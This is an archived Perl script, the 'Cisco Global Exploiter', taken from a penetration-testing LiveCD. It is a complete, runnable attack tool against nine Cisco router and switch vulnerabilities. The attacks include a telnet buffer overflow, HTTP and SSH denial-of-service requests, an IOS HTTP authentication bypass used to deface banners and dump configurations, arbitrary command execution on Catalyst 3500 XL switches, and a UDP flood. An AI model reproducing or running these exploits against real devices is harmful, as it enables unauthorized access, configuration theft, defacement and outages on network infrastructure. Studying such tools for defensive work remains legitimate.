home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / cisco / Cisco-Global-Exploiter.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  12KB  |  377 lines

---

1. #!/usr/bin/perl
2.  
3. ##
4. #   Cisco Global Exploiter
5. #
6. #   Legal notes :
7. #   The BlackAngels staff refuse all responsabilities 
8. #   for an incorrect or illegal use of this software 
9. #   or for eventual damages to others systems.
10. #
11. #   www blackangels it
12. ##
13.  
14.  
15.  
16. ############
17. # Modules ##
18. ############
19.  
20. use Socket;
21. use IO::Socket;
22.  
23.  
24. #########
25. # Main ##
26. #########
27.  
28. $host = "";
29. $expvuln = "";
30. $host = @ARGV[ 1 ];
31. $expvuln = @ARGV[ 3 ];
32.  
33. if ($host eq "") {
34. usage();
35. }
36. if ($expvuln eq "") {
37. usage();
38. }
39. if ($expvuln eq "1") {
40. cisco1();
41. } 
42. elsif ($expvuln eq "2") {
43. cisco2();
44. } 
45. elsif ($expvuln eq "3") {
46. cisco3();
47. } 
48. elsif ($expvuln eq "4") {
49. cisco4();
50. } 
51. elsif ($expvuln eq "5") {
52. cisco5();
53. } 
54. elsif ($expvuln eq "6") {
55. cisco6();
56. } 
57. elsif ($expvuln eq "7") {
58. cisco7();
59. } 
60. elsif ($expvuln eq "8") {
61. cisco8();
62. } 
63. elsif ($expvuln eq "9") {
64. cisco9();
65. }
66. else {
67. printf "\nInvalid vulnerability number ...\n\n";
68. exit(1);
69. }
70.  
71.  
72. ##############
73. # Functions ##
74. ##############
75.  
76. sub usage
77. {
78.   printf "\nUsage :\n";
79.   printf "perl cge.pl -h <host> -v <vulnerability number>\n\n";
80.   printf "Vulnerabilities list :\n";
81.   printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
82.   printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
83.   printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
84.   printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
85.   printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
86.   printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
87.   printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
88.   printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
89.   printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n\n";
90.   exit(1);
91. }
92.  
93. sub cisco1              # Cisco 677/678 Telnet Buffer Overflow Vulnerability
94. {
95.   my $serv = $host;
96.   my $dch = "?????????????????a~                %%%%%XX%%%%%"; 
97.   my $num = 30000;
98.   my $string .= $dch x $num; 
99.   my $shc="\015\012";
100.  
101.   my $sockd = IO::Socket::INET->new (
102.                                      Proto    => "tcp",
103.                                      PeerAddr => $serv,
104.                                      PeerPort => "(23)",
105.                                      ) || die("No telnet server detected on $serv ...\n\n");
106.  
107.   $sockd->autoflush(1);
108.   print $sockd "$string". $shc;
109.   while (<$sockd>){ print }
110.   print("\nPacket sent ...\n");
111.   sleep(1);
112.   print("Now checking server's status ...\n");
113.   sleep(2);
114.  
115.   my $sockd2 = IO::Socket::INET->new (
116.                                       Proto    => "tcp",
117.                                       PeerAddr => $serv,
118.                                       PeerPort => "(23)",
119.                                       ) || die("Vulnerability successful exploited. Target server is down ...\n\n");
120.  
121.   print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");   
122.   exit(1);
123. }
124.  
125. sub cisco2              # Cisco IOS Router Denial of Service Vulnerability
126. {
127.   my $serv = $host;
128.  
129.   my $sockd = IO::Socket::INET->new (
130.                                      Proto=>"tcp",
131.                                      PeerAddr=>$serv,
132.                                      PeerPort=>"http(80)",);
133.                                      unless ($sockd){die "No http server detected on $serv ...\n\n"};
134.   $sockd->autoflush(1);
135.   print $sockd "GET /\%\% HTTP/1.0\n\n";
136.   -close $sockd;
137.   print "Packet sent ...\n";
138.   sleep(1);
139.   print("Now checking server's status ...\n");
140.   sleep(2);
141.  
142.   my $sockd2 = IO::Socket::INET->new (
143.                                       Proto=>"tcp",
144.                                       PeerAddr=>$serv,
145.                                       PeerPort=>"http(80)",);
146.                                       unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};
147.  
148.   print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");   
149.   exit(1);
150. }
151.  
152. sub cisco3              # Cisco IOS HTTP Auth Vulnerability
153. {
154.   my $serv= $host;
155.   my $n=16;
156.   my $port=80;
157.   my $target = inet_aton($serv);
158.   my $fg = 0;
159.  
160.   LAB: while ($n<100) { 
161.   my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
162.   foreach $line (@results){
163.           $line=~ tr/A-Z/a-z/;
164.           if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
165.           if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
166.   }  
167.  
168.   if ($fg==1) {
169.                sleep(2);
170.                print "Vulnerability unsuccessful exploited with $n ...\n\n\r";
171.               }
172.   else {
173.         sleep(2);
174.         print "Vulnerability successful exploited with $n ...\n\n\r"; 
175.         last LAB; 
176.        }
177.         
178.   $n++;
179.  
180.   sub exploit {
181.                my ($pstr)=@_;
182.                socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
183.                die("Unable to initialize socket ...\n\n");
184.                if(connect(S,pack "SnA4x8",2,$port,$target)){
185.                                                             my @in;
186.                                                             select(S);      
187.                                                             $|=1;  
188.                                                             print $pstr;
189.                                                             while(<S>){ push @in, $_;}
190.                                                             select(STDOUT); close(S); return @in;
191.                                                            } 
192.   else { die("No http server detected on $serv ...\n\n"); }
193.   }
194.   }    
195.   exit(1);
196. }
197.  
198. sub cisco4              # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
199. {
200.   my $serv = $host;
201.   my $n = 16;
202.  
203.   while ($n <100) { 
204.                    exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
205.                    $wr =~ s/\n//g;
206.                    if ($wr =~ /200 ok/) { 
207.                                               while(1)
208.                                               { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
209.                                                 print "[1] Banner change\n";
210.                                                 print "[2] List vty 0 4 acl info\n";
211.                                                 print "[3] Other\n";
212.                                                 print "Enter a valid option [ 1 - 2 - 3 ] : ";
213.                                                 $vuln = <STDIN>; 
214.                                                 chomp($vuln);
215.  
216.                    if ($vuln == 1) { 
217.                                     print "\nEnter deface line : ";
218.                                     $vuln = <STDIN>; 
219.                                     chomp($vuln);
220.                                     exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
221.                                    }
222.                    elsif ($vuln == 2) { 
223.                                        exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); 
224.                                        print "$wrf";
225.                                       } 
226.                    elsif ($vuln == 3) 
227.                                       { print "\nEnter attack URL : ";
228.                                         $vuln = <STDIN>; 
229.                                         chomp($vuln);
230.                                         exploit1("GET /$vuln HTTP/1.0\n\n");
231.                                         print "$wrf";
232.                                       }
233.          }
234.          }
235.          $wr = ""; 
236.          $n++;
237.   }
238.   die "Vulnerability unsuccessful exploited ...\n\n";
239.  
240.   sub exploit1 { 
241.                 my $sockd = IO::Socket::INET -> new (
242.                                                      Proto    => 'tcp',
243.                                                      PeerAddr => $serv,
244.                                                      PeerPort  => 80,
245.                                                      Type      => SOCK_STREAM,
246.                                                      Timeout   => 5);
247.                                                      unless($sockd){die "No http server detected on $serv ...\n\n"}
248.   $sockd->autoflush(1);
249.   $sockd -> send($_[0]);
250.   while(<$sockd>){$wr .= $_} $wrf = $wr;
251.   close $sockd;
252.   } 
253.   exit(1);  
254. }
255.  
256. sub cisco5              # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
257. {
258.   my $serv = $host; 
259.   my $port = 22; 
260.   my $vuln = "a%a%a%a%a%a%a%";
261.  
262.   my $sockd = IO::Socket::INET->new (
263.                                      PeerAddr => $serv,
264.                                      PeerPort => $port,
265.                                      Proto    => "tcp")
266.                                      || die "No ssh server detected on $serv ...\n\n";
267.  
268.   print "Packet sent ...\n";
269.   print $sockd "$vuln";
270.   close($sockd);
271.   exit(1);
272. }
273.  
274. sub cisco6              # Cisco 675 Web Administration Denial of Service Vulnerability
275. {
276.   my $serv = $host; 
277.   my $port = 80; 
278.   my $vuln = "GET ? HTTP/1.0\n\n";
279.  
280.   my $sockd = IO::Socket::INET->new (
281.                                      PeerAddr => $serv,
282.                                      PeerPort => $port,
283.                                      Proto    => "tcp")
284.                                      || die "No http server detected on $serv ...\n\n";
285.  
286.   print "Packet sent ...\n";
287.   print $sockd "$vuln";
288.   sleep(2);
289.   print "\nServer response :\n\n";
290.   close($sockd);   
291.   exit(1);
292. }
293.  
294. sub cisco7              # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
295. {
296.   my $serv = $host; 
297.   my $port = 80; 
298.   my $k = "";
299.   
300.   print "Enter a file to read [ /show/config/cr set as default ] : ";
301.   $k = <STDIN>;
302.   chomp ($k);
303.   if ($k eq "")
304.   {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
305.   else
306.   {$vuln = "GET /exec$k HTTP/1.0\n\n";}
307.  
308.   my $sockd = IO::Socket::INET->new (
309.                                      PeerAddr => $serv,
310.                                      PeerPort => $port,
311.                                      Proto    => "tcp")
312.                                      || die "No http server detected on $serv ...\n\n";
313.  
314.   print "Packet sent ...\n";
315.   print $sockd "$vuln";
316.   sleep(2);
317.   print "\nServer response :\n\n";
318.   while (<$sockd>){print}
319.   close($sockd);   
320.   exit(1);
321. }
322.  
323. sub cisco8              # Cisco IOS Software HTTP Request Denial of Service Vulnerability 
324. {
325.   my $serv = $host; 
326.   my $port = 80; 
327.   my $vuln = "GET /error?/ HTTP/1.0\n\n";
328.  
329.   my $sockd = IO::Socket::INET->new (
330.                                      PeerAddr => $serv,
331.                                      PeerPort => $port,
332.                                      Proto    => "tcp")
333.                                      || die "No http server detected on $serv ...\n\n";
334.  
335.   print "Packet sent ...\n";
336.   print $sockd "$vuln";
337.   sleep(2);
338.   print "\nServer response :\n\n";
339.   while (<$sockd>){print}
340.   close($sockd);   
341.   exit(1);
342. }
343.  
344. sub cisco9              # Cisco 514 UDP Flood Denial of Service Vulnerability
345. {
346.   my $ip = $host;
347.   my $port = "514";
348.   my $ports = ""; 
349.   my $size = "";
350.   my $i = "";
351.  
352.   print "Input packets size : ";
353.   $size = <STDIN>; 
354.   chomp($size);
355.  
356.   socket(SS, PF_INET, SOCK_DGRAM, 17);
357.   my $iaddr = inet_aton("$ip");
358.  
359.   for ($i=0; $i<10000; $i++) 
360.   {send(SS, 0, $size, sockaddr_in($port, $iaddr));}
361.  
362.   printf "\nPackets sent ...\n";
363.   sleep(2);
364.   printf "Please enter a server's open port : ";
365.   $ports = <STDIN>;
366.   chomp $ports;
367.   printf "\nNow checking server status ...\n";
368.   sleep(2);
369.  
370.   socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
371.   my $dest = sockaddr_in ($ports, inet_aton($ip));
372.   connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";
373.  
374.   printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
375.   exit(1);
376. } 
377.